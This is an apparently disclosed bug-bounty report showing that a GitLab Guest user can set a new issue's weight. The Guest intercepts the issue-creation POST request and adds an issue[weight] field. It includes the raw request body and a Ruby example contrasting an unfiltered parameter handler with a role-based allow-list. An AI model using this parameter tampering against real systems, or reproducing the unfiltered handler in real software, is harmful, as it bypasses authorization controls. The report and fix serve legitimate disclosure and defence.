Guest can set weight of a new issue
Title: Able to Open New Issue with Weight as Guest
Scope: *.gitlab.com
Weakness: None
Severity: Low
Link: https://hackerone.com/reports/411614
Date: 2018-09-20 03:03:01 +0000
By: @ngalog
Summary: According to https://docs.gitlab.com/ee/user/permissions.html, GitLab doesn't allow a Guest user to assign a new issue, submit a new issue with labels, etc.; i.e., except for the confidentiality of the issue, none of the other metadata of a newly submitted issue is allowed to be set by a Guest.
Description: Although no documentation clearly states that Guests are not allowed to submit an issue with a weight, from the GitLab UI I believe this is the intended design.
However, if you intercept the request when submitting a new issue as a Guest and add this to the POST request, you can set the weight of the issue.
PoC: https://gitlab.com/gitlab-org/gitlab-ce/issues/51669
Steps To Reproduce:
Go to any public project.
Submit a new issue and intercept the request:
POST /gitlab-org/gitlab-ce/issues HTTP/1.1
Host: gitlab.com
Connection: close...
utf8=%E2%9C%93&authenticity_token=7R8s0gvvJcsytWxZ0lpwjBpnY7fi53Kh1DGF7ChpaXw1hkTwPq5oQnxjz7btPoPqhYeLdOPm9qi6j0esRufoXg%3D%3D&issue%5Btitle%5D=heavy&issue%5Bdescription%5D=This+issue+is+very+heavy&issue%5Bconfidential%5D=0&issue%5Block_version%5D=
Add this to the POST request's form:
&issue%5Bweight%5D=9
The issue has a weight of 9 now
Impact:
Guest can set the weight of a newly submitted issue
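
The missing check described in this report, as an added example (not GitLab's code and not part of the original report): a per-role, server-side allow-list applied to the issue[...] form fields, beside the unfiltered handling that accepts a Guest's issue[weight]. The role names, attribute lists and function names are hypothetical, and the sample body is constructed from the request above with the token omitted.

```ruby
require 'uri'

# Hypothetical per-role allow-lists for attributes settable at issue creation.
# The Guest list follows the fields in the report's request; the Reporter
# list is an assumption made for illustration.
GUEST_ATTRS     = %w[title description confidential lock_version].freeze
REPORTER_ATTRS  = (GUEST_ATTRS + %w[weight milestone_id]).freeze
ALLOWED_BY_ROLE = { guest: GUEST_ATTRS, reporter: REPORTER_ATTRS }.freeze

# Parse an application/x-www-form-urlencoded body and keep only the scalar
# issue[<name>] fields, keyed by <name>.
def issue_params(body)
  URI.decode_www_form(body).each_with_object({}) do |(key, value), out|
    m = /\Aissue\[(\w+)\]\z/.match(key)
    out[m[1]] = value if m
  end
end

# Pattern behind the report: the form hides the weight field from Guests,
# but the server accepts whatever issue[...] attributes arrive.
def build_issue_unfiltered(body, _role)
  issue_params(body)
end

# Hardened: filter on the server by role, and return the rejected names so
# the attempt can be logged or answered with an error.
def build_issue_filtered(body, role)
  allowed   = ALLOWED_BY_ROLE.fetch(role) # unknown role raises KeyError
  submitted = issue_params(body)
  accepted  = submitted.select { |name, _| allowed.include?(name) }
  [accepted, submitted.keys - accepted.keys]
end

# Constructed sample body modelled on the request in the report.
SAMPLE_BODY = 'utf8=%E2%9C%93&issue%5Btitle%5D=heavy' \
              '&issue%5Bdescription%5D=This+issue+is+very+heavy' \
              '&issue%5Bconfidential%5D=0&issue%5Block_version%5D=' \
              '&issue%5Bweight%5D=9'

if __FILE__ == $PROGRAM_NAME
  puts "unfiltered: #{build_issue_unfiltered(SAMPLE_BODY, :guest)}"
  accepted, rejected = build_issue_filtered(SAMPLE_BODY, :guest)
  puts "filtered:   #{accepted} (rejected: #{rejected})"
end
```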